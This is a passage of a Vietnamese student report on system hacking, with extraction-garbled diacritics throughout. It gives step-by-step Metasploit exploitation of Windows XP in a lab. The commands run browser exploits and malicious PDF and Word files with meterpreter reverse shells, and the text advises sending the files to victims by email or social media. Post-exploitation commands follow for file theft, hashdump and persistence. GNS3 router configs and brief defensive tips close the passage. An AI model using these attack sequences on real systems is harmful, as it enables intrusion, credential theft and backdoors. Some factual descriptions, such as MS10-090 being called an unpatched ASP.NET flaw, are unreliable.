d ng nó thành m t máy ch ISA. Đ gi i quy t v n đ này, chúng ta có th l uự ộ ủ ể ả ế ấ ề ể ư
snapshot c a máy A t i th i đi m nó là domain controller, sau đó c u hình nóủ ạ ờ ể ấ
thành m t máy ch ISA và l u snapshot. Khi c n s d ng máy o A v i vai trò làộ ủ ư ầ ử ụ ả ớ
m t Domain Controller hay ISA, ta sẽ dùng trình qu n lý Snapshot Manager độ ả ể
chuy n t i tr ng thái mong mu n.ể ớ ạ ố
PH N 3: S D NG BACKTRACK Đ KHAI THÁC XÂMẦ Ử Ụ Ể NH P TRONG M NG LANẬ Ạ
1. H đi u hành Backtrack 5 R3ệ ề
Backtrack là m t b n phân ph i d ng Live DVD c a Linux, đ c phát tri nộ ả ố ạ ủ ượ ể
đ th nghi m xâm nh p. Backtrack là s h p nh t gi a 3 b n phân ph i khácể ử ệ ậ ự ợ ấ ữ ả ố
nhau c a Linux v thâm nh p th nghi m IWHAX, WHOPPIX, và Auditor. Trongủ ề ậ ử ệ
phiên b n hi n t i c a nó (5), Backtrack đ c d a trên phiên b n phân ph iả ệ ạ ủ ượ ự ả ố
Linux Ubuntu 11.10.
Công c Backtrack đã có l ch s phát tri n khá lâu qua nhi u b n linuxụ ị ử ể ề ả
khác nhau. Phiên b n hi n nay s d ng b n phân ph i Slackware linux (Tomasả ệ ử ụ ả ố
M.(www.slax.org)). Backtrack liên t c c p nh t các công c , drivers,... Hi n t iụ ậ ậ ụ ệ ạ
Backtrack có trên 300 công c ph c v cho vi c nghiên c u b o m t. Backtrackụ ụ ụ ệ ứ ả ậ
là s k t h p gi a 2 b công c ki m th b o m t r t n i ti ng là Whax vàự ế ợ ữ ộ ụ ể ử ả ậ ấ ổ ế
Auditor.
Backtrack 5 ch a m t s công c có th đ c s d ng trong quá trình thứ ộ ố ụ ể ượ ử ụ ử
nghi m thâm nh p c a chúng ta. Các công c ki m tra thâm nh p trongệ ậ ủ ụ ể ậ
Huỳnh Minh Trí Page 19
System Hacking
Backtrack 5 có th đ c phân lo i nh sau:ể ượ ạ ư
– Information gathering: lo i này có ch a m t s công c có th đ c sạ ứ ộ ố ụ ể ượ ử
d ng đ có đ c thông tin liên quan đ n m t m c tiêu DNS, đ nh tuy n, đ a chụ ể ượ ế ộ ụ ị ế ị ỉ
e-mail, trang web, máy ch mail, và nh v y. Thông tin này đ c th u th p tủ ư ậ ượ ậ ừ
các thông tin có s n trên Internet, mà không c n ch m vào môi tr ng m c tiêu.ẵ ầ ạ ườ ụ
– Network mapping: lo i này ch a các công c có th đ c s d ng đạ ứ ụ ể ượ ử ụ ể
ki m tra các host đang t n t i, thông tin v OS, ng d ng đ c s d ng b iể ồ ạ ề ứ ụ ượ ử ụ ở
m c tiêu, và cũng làm portscanning. ụ
– Vulnerability identification: Trong th lo i này, chúng ta có th tìmể ạ ể
th y các công c đ quét các l h ng (t ng h p) và trong các thi t b Cisco. Nóấ ụ ể ỗ ổ ổ ợ ế ị
cũng ch a các công c đ th c hi n và phân tích Server Message Block (SMB) vàứ ụ ể ự ệ
Simple Network Management Protocol (SNMP).
– Web application analysis: lo i này ch a các công c có th đ c sạ ứ ụ ể ượ ử
d ng trong theo dõi, giám sát các ng d ng web.ụ ứ ụ
– Radio network analysis: Đ ki m tra m ng không dây, bluetooth vàể ể ạ
nh n d ng t n s vô tuy n (RFID), chúng ta có th s d ng các công c trongậ ạ ầ ố ế ể ử ụ ụ
th lo i này. ể ạ
– Penetration: lo i này ch a các công c có th đ c s d ng đ khaiạ ứ ụ ể ượ ử ụ ể
thác các l h ng tìm th y trong các máy tính m c tiêu. ỗ ổ ấ ụ
– Privilege escalation: Sau khi khai thác các l h ng và đ c truy c p vàoỗ ổ ượ ậ
các máy tính m c tiêu, chúng ta có th s d ng các công c trong lo i này đụ ể ử ụ ụ ạ ể
nâng cao đ c quy n c a chúng ta cho các đ c quy n cao nh t. ặ ề ủ ặ ề ấ
– Maintaining access: Công c trong lo i này sẽ có th giúp chúng taụ ạ ể
trong vi c duy trì quy n truy c p vào các máy tính m c tiêu. Chúng ta có thệ ề ậ ụ ể Huỳnh Minh Trí Page 20
System Hacking
c n đ có đ c nh ng đ c quy n cao nh t tr c khi các chúng ta có th cài đ tầ ể ượ ữ ặ ề ấ ướ ể ặ
công c đ duy trì quy n truy c p. ụ ể ề ậ
– Voice Over IP (VOIP): Đ phân tích VOIP chúng ta có th s d ng cácể ể ử ụ
công c trong th lo i này. ụ ể ạ
– Digital forensics: Trong lo i này, chúng ta có th tìm th y m t s côngạ ể ấ ộ ố
c có th đ c s d ng đ làm phân tích kỹ thu t nh có đ c hình nh đĩaụ ể ượ ử ụ ể ậ ư ượ ả
c ng, c u trúc các t p tin, và phân tích hình nh đĩa c ng. Đ s d ng các côngứ ấ ậ ả ứ ể ử ụ
c cung c p trong th lo i này, chúng ta có th ch n Start Backtrack Forensicsụ ấ ể ạ ể ọ
trong trình đ n kh i đ ng. Đôi khi sẽ đòi h i chúng ta ph i g n k t n i b đĩaơ ở ộ ỏ ả ắ ế ộ ộ
c ng và các t p tin trao đ i trong ch đ ch đ c đ b o t n tính toàn v n. ứ ậ ổ ế ộ ỉ ọ ể ả ồ ẹ
– Reverse engineering: Th lo i này ch a các công c có th đ c sể ạ ứ ụ ể ượ ử
d ng đ g r i ch ng trình m t ho c tháo r i m t t p tin th c thi. ụ ể ỡ ố ươ ộ ặ ờ ộ ậ ự
2. Ph n m m Metasploitầ ề
Metasploit là m t d án b o m t máy tính cung c p các thông tin v v n đ lộ ự ả ậ ấ ề ấ ề ỗ
h ng b o m t cũng nh giúp đ v ki m tra thăm nh p và phát tri n h th ngổ ả ậ ư ỡ ề ể ậ ể ệ ố
phát hi n t n công m ng. Metasploit Framework là m t môi tr ng dùng đệ ấ ạ ộ ườ ể
ki m tra, t n công và khai thác l i c a các service. Metasploit đ c xây d ng tể ấ ỗ ủ ượ ự ừ
ngôn ng h ng đ i t ng Perl, v i nh ng components đ c vi t b ng C,ữ ướ ố ượ ớ ữ ượ ế ằ
assembler, và Python. Metasploit có th ch y trên h u h t các h đi u hành:ể ạ ầ ế ệ ề
Linux, Windows, MacOS. Chúng ta có th download ch ng trình t iể ươ ạ
www.metasploit.com
Metasploit h tr nhi u giao di n v i ng i dùng:ỗ ợ ề ệ ớ ườ
– Console interface: dùng l nh msfconsole. Msfconsole interface s d ngệ ử ụ
các dòng l nh đ c u hình, ki m tra nên nhanh h n và m m d o h n. ệ ể ấ ể ơ ề ẻ ơ
Huỳnh Minh Trí Page 21
System Hacking
– Web interface: dùng msfweb, giao ti p v i ng i dùng thông qua giaoế ớ ườ
di n Web. ệ
– Command line interface: dùng msfcli.
Metasploit Enviroment:
– Global Enviroment: Đ c th c thi thông qua 2 câu l nh setg và unsetg,ượ ự ệ
nh ng options đ c gán đây sẽ mang tính toàn c c, đ c đ a vào t t c cácữ ượ ở ụ ượ ư ấ ả
module exploits.
– Temporary Enviroment: Đ c th c thi thông qua 2 câu l nh set vàượ ự ệ
unset, enviroment này ch đ c đ a vào module exploit đang load hi n t i,ỉ ượ ư ệ ạ
không nh h ng đ n các module exploit khác Chúng có th l u l i enviromentả ưở ế ể ư ạ
mình đã c u hình thông qua l nh save. Môi tr ng đó sẽ đ c l u trongấ ệ ườ ượ ư
./msf/config và sẽ đ c load tr l i khi user interface đ c th c hi n. ượ ở ạ ượ ự ệ
S d ng Metasploit Framework:ử ụ
2.1 Ch n module exploit: L a ch n ch ng trình, d ch v l i màọ ự ọ ươ ị ụ ỗ
Metasploit có h tr đ khai thácỗ ợ ể
Show exploits: xem các module exploit mà framework có h tr . ỗ ợ
Use exploit_name: ch n module exploit.ọ
Info exploit_name: xem thông tin v module exploit.ề
Chúng ta nên c p nh t th ng xuyên các l i d ch v cũng nh các moduleậ ậ ườ ỗ ị ụ ư
trên www.metasploit.com ho c qua l nh msfupdate ho cặ ệ ặ
svnupdat/opt/metasploit/msf3/
2.2 C u hình Module exploit đã ch n:ấ ọ
Huỳnh Minh Trí Page 22
System Hacking
show options: Xác đ nh nh ng options nào c n c u hình. set: c u hình choị ữ ầ ấ ấ
nh ng option c a module đó.ữ ủ
M t vài module còn có nh ng advanced options, chúng ta có th xem b ngộ ữ ể ằ
cách gõ dòng l nh show advanceds.ệ
2.3 Verify nh ng options v a c u hình:ữ ừ ấ
check: ki m tra xem nh ng option đã đ c set chính xác ch a.ể ữ ượ ư
2.4 L a ch n target:ự ọ
show targets: nh ng target đ c cung c p b i module đó. set: xác đ nhữ ượ ấ ở ị
target nào.
2.5 L a ch n payload:ự ọ
show payloads: li t kê ra nh ng payload c a module exploit hi n t i. ệ ữ ủ ệ ạ
info payload_name: xem thông tin chi ti t v payload đó.ế ề
set payload payload_name: xác đ nh payload module name. Sau khi l aị ự
ch n payload nào, dùng l nh show options đ xem nh ng options c a payloadọ ệ ể ữ ủ
đó.
show advanced: xem nh ng advanced options c a payload đó.ữ ủ
2.6 Th c thi exploit:ự
exploit: l nh dùng đ th c thi payload code. Payload sau đó sẽệ ể ự
cung c p cho chúng ta nh ng thông tin v h th ng đ c khai thác.ấ ữ ề ệ ố ượ
3. S đ t ng quan h th ng m ng LANơ ồ ổ ệ ố ạ
Huỳnh Minh Trí Page 23
System Hacking
S đ t ng quan h th ng m ng LANơ ồ ổ ệ ố ạ
Trong m t m ng LAN n i b , các máy tính th ng k t n i v i nhau v iộ ạ ộ ộ ườ ế ố ớ ớ
kho ng cách v t lý g n nh trong m t phòng, m t t ng, m t tòa nhà, công ty, …ả ậ ầ ư ộ ộ ầ ộ
Các máy tính trong m ng LAN có th chia s tài nguyên v i nhau, mà đi n hìnhạ ể ẻ ớ ể
là chia s t p tin, máy in, máy quét và m t s thi t b khác. Khi m t máy tính ẻ ậ ộ ố ế ị ộ ở
trong m ng LAN, nó có th s d ng các ch ng trình, ph n m m quét h th ngạ ể ử ụ ươ ầ ề ệ ố
m ng đ bi t đ c đ a ch IP các host có trong m ng.ạ ể ế ượ ị ỉ ạ
Nmap (Network Mapper) là m t ti n ích ngu n m mi n phí cho phátộ ệ ồ ở ễ
hi n m ng và ki m toán an ninh. Nmap và Zenmap (Công c h tr đ h a c aệ ạ ể ụ ỗ ợ ồ ọ ủ
nmap) đ c cài đ t s n trong BackTrack, s d ng các gói tin IP giúp xác đ nhượ ặ ẵ ử ụ ị
host nào có s n trên m ng, các d ch v (tên ng d ng và phiên b n) mà host đóẵ ạ ị ụ ứ ụ ả
đang cung c p, h đi u hành gì (và các phiên b n h đi u hành) mà h đangấ ệ ề ả ệ ề ọ
Huỳnh Minh Trí Page 24
System Hacking
ch y, lo i b l c gói tin ho c t ng l a nào đang s d ng, và nhi u đ c đi mạ ạ ộ ọ ặ ườ ử ử ụ ề ặ ể
khác. Nmap ch y đ c trên t t c các h đi u hành, và các gói nh phân chínhạ ượ ấ ả ệ ề ị
th c có s n cho Linux, Windows, và Mac OSX.ứ ẵ
Sau khi xác đ nh đ c các host có trong m ng, ta có th s d ng các côngị ượ ạ ể ử ụ
c quét l i h th ng đ xác đ nh l h ng c a h th ng mu n xâm nh p, t đóụ ỗ ệ ố ể ị ỗ ổ ủ ệ ố ố ậ ừ
khai thác truy c p vào h th ng. M t trong s các công c quét l i này làậ ệ ố ộ ố ụ ỗ
Nessus.
M t khi đã xâm nh p thành công và chi m đ c toàn quy n đi u khi nộ ậ ế ượ ề ề ể
h th ng, Hacker có th th c hi n m i vi c trên máy n n nhân nhệ ố ể ự ệ ọ ệ ạ ư
down/upload files, thay đ i c u trúc h th ng, th c thi ch ng trình, đánh c pổ ấ ệ ố ự ươ ắ
m t kh u, cài trojan/ backdoor …ậ ẩ
4. Xâm nh p và khai thác Windows XPậ
Hacker:
– H đi u hành Back Track 5 ệ ề
– Đ a ch IP: 10.10.10.2 ị ỉ
4.1 Khai thác l h ng Ms10-090ổ ỏ
a) Mô t :ả
L i này n m trong c ch th c hi n mã hóa phiên làm vi c c a ng d ngỗ ằ ơ ế ự ệ ệ ủ ứ ụ
web ASP.NET, d n t i vi c k t n công có th thăm dò đ tìm ra khóa gi i mãẫ ớ ệ ẻ ấ ể ể ả
trong m t th i gian ng n. Hi n t i ch a có b n vá chính th c cho l i này.ộ ờ ắ ệ ạ ư ả ứ ỗ
b) Ph n m m b nh h ng:ầ ề ị ả ưở
T t c các h đi u hành dùng các phiên b n IE6 , IE7 và IE8ấ ả ệ ề ả
Huỳnh Minh Trí Page 25
System Hacking
c) Cách th hi n t n công:ự ệ ấ
Kh i đ ng msfconsole t c a s terminal c a BackTrack: ở ộ ử ử ổ ủ
> msfconsole
Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ
> search ms10_090
> use exploit/windows/browser/ms10_090_ie_css_clip
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set PAYLOAD windows/meterpreter/reverse_tcp
> exploit
BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80iT1b69v).ạ ộ ứ ộ
Ch c n n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ cỉ ầ ạ ấ ộ ự ộ ử ộ
sang máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n nạ ể ế ề ủ ạ
nhân đó.
Ti n hành khai thác máy n n nhânế ạ
> sessions
>sessions –i 1
4.2 Khai thác l h ng Ms10-042 ổ ỏ
a) Mô t : ả
Huỳnh Minh Trí Page 26
System Hacking
L h ng này có th cho phép th c thi mã t xa n u ng i dùng xem m tỗ ổ ể ự ừ ế ườ ộ
trang web thi t k đ c bi t b ng cách s d ng m t trình duy t web ho c nh pế ế ặ ệ ằ ử ụ ộ ệ ặ ấ
vào m t liên k t thi t k đ c bi t trong m t thông báo e-mail. ộ ế ế ế ặ ệ ộ
b) Ph n m m b nh h ng: ầ ề ị ả ưở
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003
with SP2 for Itanium-based Systems
c) Cách th c hi n t n công: ự ệ ấ
Kh i đ ng msfconsole t c a s terminal c a BackTrack: ở ộ ử ử ổ ủ
> msfconsole
Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ
> search ms10_042
> use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set PAYLOAD windows/meterpreter/reverse_tcp
> exploit
Huỳnh Minh Trí Page 27
System Hacking
BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80). Ch c nạ ộ ứ ộ ỉ ầ
n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ c sangạ ấ ộ ự ộ ử ộ
máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n n nhânạ ể ế ề ủ ạ
đó.
Ti n hành khai thác máy n n nhânế ạ
> sessions
> sessions –i 1
4.3 Khai thác l h ng Ms12-004 ổ ỏ
a) Mô t : ả
Các l h ng có th cho phép th c thi mã t xa n u ng i dùng m m tỗ ổ ể ự ừ ế ườ ở ộ
t p tin ph ng ti n truy n thông thi t k đ c bi t. M t k t n công khai thácậ ươ ệ ề ế ế ặ ệ ộ ẻ ấ
thành công l h ng có th l y đ c quy n s d ng gi ng nh ng i dùng đ aỗ ổ ể ấ ượ ề ử ụ ố ư ườ ị
ph ng. Ng i dùng có tài kho n đ c c u hình đ có quy n s d ng ít h nươ ườ ả ượ ấ ể ề ử ụ ơ
trên h th ng có th đ c ít nh h ng h n so v i nh ng ng i dùng ho tệ ố ể ượ ả ưở ơ ớ ữ ườ ạ
đ ng v i ng i s d ng quy n hành chính… ộ ớ ườ ử ụ ề
b) Ph n m m b nh h ng: Windows XP Windows Server 2003ầ ề ị ả ưở
Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2
c) Cách th c hi n t n công ự ệ ấ
Kh i đ ng msfconsole t c a s terminal c a BackTrack ở ộ ử ử ổ ủ
>msfconsole
Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ
> Search ms12_004
Huỳnh Minh Trí Page 28
System Hacking
> use exploit/windows/browser/ms12_004_midi
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set payload windows/meterpreter/reverse_tcp
>exploit
BackTrack sẽ t o ra m t link ch a mã đ c (http://10.10.10.2:80). Ch c nạ ộ ứ ộ ỉ ầ
n n nhân nh p chu t vào link trên thì BackTrack sẽ t d ng g i mã đ c sangạ ấ ộ ự ộ ử ộ
máy n n nhân và sau đó có th xem thông tin, chi n quy n c a máy n n nhânạ ể ế ề ủ ạ
đó.
Ti n hành khai thác máy n n nhânế ạ
> sessions
> sessions –i 1
4.4 Khai thác l h ng file PDF qua Adobe Reader 9.xổ ỏ
a) Mô t : ả
Nguyên t c khai thác l i đây khá đ n gi n, b n sẽ t o ra m t file mã đ cắ ỗ ở ơ ả ạ ạ ộ ộ
có đuôi .pdf và g i cho n n nhân, làm th nào đ n n nhân nh n đ c và mử ạ ế ể ạ ậ ượ ở
file có ch a mã đ c đó lên (các b n có th t o m t Webserver gi m o, d n nứ ộ ạ ể ạ ộ ả ạ ụ ạ
nhân t i file đó v ho c có th g i kèm theo mail, quăng lên các m ng xã h i,ả ề ặ ể ử ạ ộ
các n i t i file…) và máy n n nhân đang s d ng AdobeReader 9.x. máy n nơ ả ạ ử ụ ạ
nhân sẽ b “nhi m đ c”. ị ễ ộ
Huỳnh Minh Trí Page 29
System Hacking
b) Ph n m m b nh h ng: ầ ề ị ả ưở
Adobe Reader 9.x ch y trên n n Windows XP SP3 ạ ề
c) Cách th c hi n t n công: ự ệ ấ
Đi u ki n: Victim ph i cài đ t ph n m n Adobe Reader 9.x ề ệ ả ặ ầ ề
Kh i đ ng msfconsole t c a s terminal c a BackTrack. ở ộ ử ử ổ ủ
>msfconsole
Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ
> Search nojs
> use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
> show options
> set filename test.pdf (đây là tên do mình t đ t v i cú pháp *.pdf) ự ặ ớ
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> set lport 5555
>exploit
Sau khi ti n hành xong các b c trên, backtrack sẽ t o 1 file pdf có ch a mãế ướ ạ ứ
đ c, file sẽ đ c l u t i root./msf4/test.pdfộ ượ ư ạ
Ti p t c th c hi n các b c sau:ế ụ ự ệ ướ
> use multi/handler
Huỳnh Minh Trí Page 30
System Hacking
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> set lport 5555
> exploit
T i đây chúng ta b t đ u g i file pdf v a t o cho máy n n nhân, khi n nớ ắ ầ ử ừ ạ ạ ạ
nhân m file backtrack sẽ g i mã đ c và chi m đ c quy n s d ng máy n nở ử ộ ế ượ ề ử ụ ạ
nhân.
4.5 Khai thác l h ng Ms12-027 ỗ ỏ
a) Mô t :ả
Nguyên t c khai thác l i đây khá đ n gi n, b n sẽ t o ra m t file mã đ cắ ỗ ở ơ ả ạ ạ ộ ộ
có đuôi .doc và g i cho n n nhân, làm th nào đ n n nhân nh n đ c và mử ạ ế ể ạ ậ ượ ở
file có ch a mã đ c đó lên (các b n có th t o m t web server gi m o, d n nứ ộ ạ ể ạ ộ ả ạ ụ ạ
nhân t i file đó v ho c có th g i kèm theo mail, …)ả ề ặ ể ử
b) Ph n m m b nh h ng: Microsoft Office 2003 Microsoft Office 2007ầ ề ị ả ưở
Microsoft Office 2010 (ngo i tr phiên b n x64-based editions) Microsoft ạ ừ ả
SQL Server 2000 Analysis Services
Microsoft SQL Server 2000 (ngo i tr phiên b n Itanium-based editions)ạ ừ ả
Microsoft SQL Server 2005 (đ i v i Microsoft SQL Server 2005 Express ố ớ
Edition ch th c hi n đ c trên Advanced Services)ỉ ự ệ ượ
Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft
BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce
Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009
Huỳnh Minh Trí Page 31
System Hacking
R2 Microsoft Visual FoxPro 8.0 Microsoft Visual FoxPro 9.0 Visual Basic 6.0
Runtime…
c) Cách th c hi n t n công:ự ệ ấ
Đi u ki n: Victim ph i cài đ t ph n m m Microsoft Office Word 2007ề ệ ả ặ ầ ề
Kh i đ ng msfconsole t c a s terminal c a BackTrack.ở ộ ử ử ổ ủ
> msfconsole
Khai báo l h ng s d ng và thi t đ t options:ỗ ổ ử ụ ế ặ
> search ms12_027
> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> show options
> set filename test.doc (đây là tên do mình t đ t v i cú pháp *.pdf) ự ặ ớ
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> set lport 5555
> exploit
Sau khi ti n hành xong các b c trên, backtrack sẽ t o 1 file word có ch aế ướ ạ ứ
mã đ c, file sẽ đ c l u t i root./msf4/test.docộ ượ ư ạ
Ti p t c th c hi n các b c sau:ế ụ ự ệ ướ
> use exploit/multi/handler
>set payload /windows/meterpreter/reverse_tcp
Huỳnh Minh Trí Page 32
System Hacking
> set lhost 0.0.0.0
> exploit
Sau khi th c hi n các b c trên, chúng ta b t đ u g i file word qua choự ệ ướ ắ ầ ử
máy n n nhân, khi n n nhân m file word backtrack sẽ t đ ng g i mã đ c quaạ ạ ở ự ộ ử ộ
và chúng ta có th chi m quy n s d ng máy n n nhânể ế ề ử ụ ạ
4.6 Khai thác thông tin sau khi đã t n công:ấ
Xem thông tin h th ng:ệ ố
> getuid
> sysinfo
T i lên và đánh c p tài li uả ắ ệ
– T i file abc.txt t i Desktop c a Back Track lên C c a XP ả ạ ủ ổ ủ
> upload /root/Desktop/abc.txt C:/
– Đánh c p file xyz.txt t i C c a XP và đem v Desktop c a Back Trackắ ạ ổ ủ ề ủ
> download C:/xyz.txt /root/Desktop
L y hashpass:ấ
> haskdump
Khám phá đĩa: ổ
meterpreter> shell
– Chuy n d u nh c sang đĩa C: ể ấ ắ ổ
> cd c:\
Huỳnh Minh Trí Page 33
System Hacking
– Li t kê tài nguyên trong C: ệ ổ
> dir
– T o th m c abc trong C: ạ ư ụ ổ
> md abc
– Xóa th m c abc trong C: ư ụ ổ
> rd abc
– Xóa file abc.txt trong C: ổ
> del abc.txt
– Tr v meterpreter:ở ề
> exit
Gi k t n i v i Victim khi Victim m t m ng hay kh i đ ng l i t i portữ ế ố ớ ấ ạ ở ộ ạ ạ
5555
> run persistence -A -S -U -X -i 1500 -P 5555
Huỳnh Minh Trí Page 34
System Hacking
PH N 4 : GNS3 VÀ MÔ PH NG H TH NG Đ NGẦ Ỏ Ệ Ố ƯỜ
M NG INTERNETẠ
1. GNS3 là gì?
GNS3 là 1 ch ng trình gi l p m ng có giao di n đ h a cho phép b n cóươ ả ậ ạ ệ ồ ọ ạ
th gi l p các lo i router Cisco s d ng IOS (h đi u hành c a router)ể ả ậ ạ ử ụ ệ ề ủ th t,ậ
ngoài ra còn có th gi l p các thi t b m ng khác nh ATM, Frame Relay,ể ả ậ ế ị ạ ư
Ethernet Switch, Pix Firewall… và đ t bi t có th k t n i vào h th ng m ngặ ệ ể ế ố ệ ố ạ
th t và s d ng nh thi t b th t.ậ ử ụ ư ế ị ậ
GNS3 đ c phát tri n d a trên Dynamips và Dynagen đ mô ph ng cácượ ể ự ể ỏ
dòng router 1700, 2600, 3600, 3700, 7200 có th s đ tri n khai các bài labể ử ể ể
c a CCNA,CCNP,CCIE nh ng hi n t i v n ch a mô ph ng Catalyst Switch.ủ ư ệ ạ ẫ ư ỏ
Ngoài ra, GNS3 còn có ch c năng liên k t máy o v i VMWare và k t n iứ ế ả ớ ế ố
Internet đ th c hi n mô ph ng các s đ m ng th c t .ể ự ệ ỏ ơ ồ ạ ự ế
2.Mô ph ng m ng Internet đ t n công t máy Backtrack t i máyỏ ạ ể ấ ừ ớ
XP:
Mô hình m ng mô ph ng:ạ ỏ
Nhà Hacker: máy Backtrack n i v i R1: 10.10.10.0/30ố ớ
Nhà Victim: máy win XP n i v i R2: 10.10.10.12/30ố ớ
Huỳnh Minh Trí Page 35
System Hacking
M ng Internet: router ISP n i v i R1: 10.10.10.4/30, R2: 10.10.10.8/30 vàạ ố ớ k t n i ra Internet: 203.164.4.2/24ế ố
C u hình:ấ
R1: conf t
int fa 0/0
ip add 10.10.10.1 255.255.255.252
ip nat inside
int s 0/0
ip add 10.10.10.5 255.255.255.252
ip nat outside
exit
access-list 1 permit 10.10.10.0 0.0.0.3
ip nat inside source list 1 int s 0/0 overload
ip nat inside source static tcp 10.10.10.2 3389 10.10.10.5 3389
Huỳnh Minh Trí Page 36
System Hacking
ip nat inside source static tcp 10.10.10.2 4444 10.10.10.5 4444
ip nat inside source static tcp 10.10.10.2 5555 10.10.10.5 5555
ip nat inside source static tcp 10.10.10.2 80 10.10.10.5 80
ip nat inside source static tcp 10.10.10.2 8080 10.10.10.5 8080
router ei 1
no auto
network 10.0.0.0
passive-interface fa 0/0
router eigrp 1
network 10.10.10.4 0.0.0.3
no auto-summary
R2: conf t
int fa 0/0
ip add 10.10.10.13 255.255.255.252
ip nat inside
int s 0/1
ip add 10.10.10.10 255.255.255.252
ip nat outside
exit
access-list 1 permit 10.10.10.12 0.0.0.3
ip nat inside source list 1 int s 0/1 overload
router ei 1
no auto
Huỳnh Minh Trí Page 37
System Hacking
network 10.10.10.12 0.0.0.3
network 10.10.10.8 0.0.0.3
ISP: conf t
int s 0/0
ip add 10.10.10.6 255.255.255.252
int s 0/1
ip add 10.10.10.9 255.255.255.252
int f 0/0
ip add 203.162.4.2 255.255.255.252
router eigrp 1
no auto
network 10.10.10.8 0.0.0.3
network 10.10.10.12 0.0.0.3
ip route 203.162.4.0 255.255.255.0 203.162.4.1
ip route 0.0.0.0 0.0.0.0 203.162.4.1
Sau khi c u hình xong máy Backtrack và XP có th ping đ c ra Internetấ ể ượ nh ng không th ping đ c l n nhau.ư ể ượ ẫ
V i mô hình này chúng ta có th xem nh đây là 2 đ ng m ng riêng bi tớ ể ư ườ ạ ệ không bi t đ a ch c a nhau nh đ ng m ng Internet th c t .ế ị ỉ ủ ư ườ ạ ự ế
Ta ti p t c th c hi n t n công t máy Backtrack t i máy win XP.ế ụ ự ệ ấ ừ ớ
Huỳnh Minh Trí Page 38
System Hacking
PH N 5: T NG K TẦ Ổ Ế
V i nh ng ki u t n công h th ng d a trên nh ng l i sai sót trong quáớ ữ ể ấ ệ ố ự ữ ỗ
trình s d ng máy tính ho c các l i v b o m t v t lý, có m t s ph ng phápử ụ ặ ỗ ề ả ậ ậ ộ ố ươ
nh m gi m thi u và phòng tránh vi c Hacker đánh c p M t kh u nh sau:ằ ả ể ệ ắ ậ ẩ ư
– M t kh u ph i đ c đ t nhi u h n 8 ký t và ph i là t ng h p gi aậ ẩ ả ượ ặ ề ơ ự ả ổ ợ ữ
ch hoa, ch th ng, s và ký t đ c bi t đ các ch ng trình khó dò ra. ữ ữ ườ ố ự ặ ệ ể ươ
– C u hình trong registry cho m t kh u trong h th ng windows chấ ậ ẩ ệ ố ỉ
đ c băm và l u d i d ng NTLM đ các ch ng trình khó khăn đ dò tìm ượ ư ướ ạ ể ươ ể
– Ng i dùng admin nên xóa t p tin sam trong th m c Windows/repairườ ậ ư ụ
sau m i l n backup d li u b ng rdisk. ỗ ầ ữ ệ ằ
Trong quá trình s d ng máy tính đ truy c p Internet, c n l u ý: ử ụ ể ậ ầ ư
– Không m t p tin đính kèm th đi n t có ngu n g c không rõ ràngở ậ ư ệ ử ồ ố
ho c không tin c y. ặ ậ
– Ch c ch n r ng b n có và đã b t h th ng t ng l a cho h th ng c aắ ắ ằ ạ ậ ệ ố ườ ử ệ ố ủ
mình.
– Đ m b o Windows c a b n đ c c p nh t th ng xuyên, ph n m mả ả ủ ạ ượ ậ ậ ườ ầ ề
b o m t c a b n có ch c năng c p nh t "live" (t đ ng c p nh t tr c tuy n). ả ậ ủ ạ ứ ậ ậ ự ộ ậ ậ ự ế
– Cài đ t ph n m m di t virut Internet Security. ặ ầ ề ệ
– Luôn s d ng các b n Office có b n quy n đ luôn đ c c p nh t váử ụ ả ả ề ể ượ ậ ậ
l i và h tr kỹ thu t t nhà cung c p. ỗ ỗ ợ ậ ừ ấ
Microsoft đã xây d ng m t lo t các công c trong Windows đ các nhàự ộ ạ ụ ể
qu n tr cũng nh ng i dùng có kinh nghi m có th phân tích chi c máy tínhả ị ư ườ ệ ể ế
Huỳnh Minh Trí Page 39
System Hacking
c a mình xem li u nó có đang b xâm ph m hay không. M t khi nghi ng máyủ ệ ị ạ ộ ờ
tính c a mình b xâm nh p, ng i dùng có th s d ng các công c này đ tủ ị ậ ườ ể ử ụ ụ ể ự
ki m tra máy tính c a mình khi có nh ng bi u hi n đáng ng : WMIC, L nh net,ể ủ ữ ể ệ ờ ệ
Openfiles, Netstat, Find.
PH L C: H NG D N CÀI Đ T M T S PH NỤ Ụ ƯỚ Ẫ Ặ Ộ Ố Ầ
M MỀ
1. Cài đ t VMwareặ
Đ u tiên các b n vào đ a ch ầ ạ ị ỉ http://www.vmware.com đ t i Vmwareể ả
phiên b n m i nh t v cũng nh là đăng ký b n quy n cho Vmware.ả ớ ấ ề ư ả ề
Ti p đó các b n m file cài đ t Vmware đã đ c t i v .ế ạ ở ặ ượ ả ề
Ch ng trình cài đ t sẽ b t đ u sau khi load xong m t s file quan tr ngươ ặ ắ ầ ộ ố ọ
Huỳnh Minh Trí Page 40
System Hacking
Ch n ọ Next
Có 2 l a ch n cho quá trình cài đ t: ự ọ ặ Typical ho c ặ CustomHuỳnh Minh Trí Page 41
System Hacking
